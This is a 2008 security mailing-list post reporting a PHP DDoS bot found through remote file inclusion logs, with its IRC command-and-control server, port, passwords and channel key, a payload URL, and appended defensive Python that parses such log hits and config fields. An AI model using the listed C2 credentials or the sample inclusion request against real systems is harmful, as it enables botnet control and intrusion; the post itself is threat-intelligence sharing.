[nsp-sec] PHP bot with ddos - hosted in UK, attn AS29131, botnet in AS16276
Jose Nazario
jose at arbor.net
Thu Oct 2 16:29:16 EDT 2008
while digging through some RFI logs and refining data processing, i came
across this little guy:
scanner 151.60.130.197, EU, 1267,
URL "http://r3df0x.altervista.org/ddoss.txt",
host 78.129.205.40, GB, 29131
not sure how many attacks can be tied to it.
IRC server info:
var $config = array("server"=>"91.121.86.73",
"port"=>6666,
"pass"=>"rull4",
"prefix"=>"[eRBaR0X]",
"maxrand"=>5,
"chan"=>"###eRBaR0X###",
"key"=>"satana",
"modes"=>"+q",
"password"=>"rull4",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost eRBa.R0X)
that IRC server:
AS | IP | CC | AS Name
16276 | 91.121.86.73 | FR | OVH OVH
server is live:
; connect 91.121.86.73 6666
:Limits.ArEa51.net NOTICE AUTH :*** Looking up your hostname...
:Limits.ArEa51.net NOTICE AUTH :*** Found your hostname
heads up ... all pieces of this live at 16:30 US Eastern.
--
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO, arbor networks
v: (734) 821 1427 http://asert.arbornetworks.com/
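
Added example, not part of the original post or of the author's tooling: one way to turn an RFI log hit into the scanner/URL pair reported above and to pull the IRC C2 fields out of a fetched payload without executing it. The log line's request path and parameter are hypothetical; the payload is a subset of the config quoted in the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: an Apache-style access-log line built for this example.
# The path and parameter name are hypothetical; the scanner IP and the
# included URL are the ones quoted in the post.
SAMPLE_LOG = (
    '151.60.130.197 - - [02/Oct/2008:16:05:11 -0400] '
    '"GET /index.php?page=http://r3df0x.altervista.org/ddoss.txt? HTTP/1.1" 404 208'
)

# Subset of the config fragment quoted in the post, as seen in a fetched payload.
SAMPLE_PAYLOAD = '''var $config = array("server"=>"91.121.86.73",
"port"=>6666,
"chan"=>"###eRBaR0X###",
"trigger"=>".",
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (?P<target>\S+)')
# Matches "key"=>"string" or "key"=>123 pairs inside a PHP array literal.
PAIR_RE = re.compile(r'"(?P<key>\w+)"\s*=>\s*(?:"(?P<str>[^"]*)"|(?P<num>\d+))')
REMOTE_RE = re.compile(r'(?i)(?:https?|ftp)://')


def rfi_attempts(line):
    """Return (scanner_ip, included_url) for query values that are remote URLs."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a request line we understand
    query = urlsplit(m.group("target")).query
    # parse_qsl percent-decodes, so encoded http%3A%2F%2F values are caught too.
    return [(m.group("ip"), value.rstrip("?"))
            for _, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value)]


def c2_indicators(php_text):
    """Extract IRC C2 fields from the bot's config array by pattern, not by eval."""
    cfg = {m["key"]: m["str"] if m["str"] is not None else int(m["num"])
           for m in PAIR_RE.finditer(php_text)}
    return {k: cfg[k] for k in ("server", "port", "chan") if k in cfg}


if __name__ == "__main__":
    print(rfi_attempts(SAMPLE_LOG))
    print(c2_indicators(SAMPLE_PAYLOAD))
```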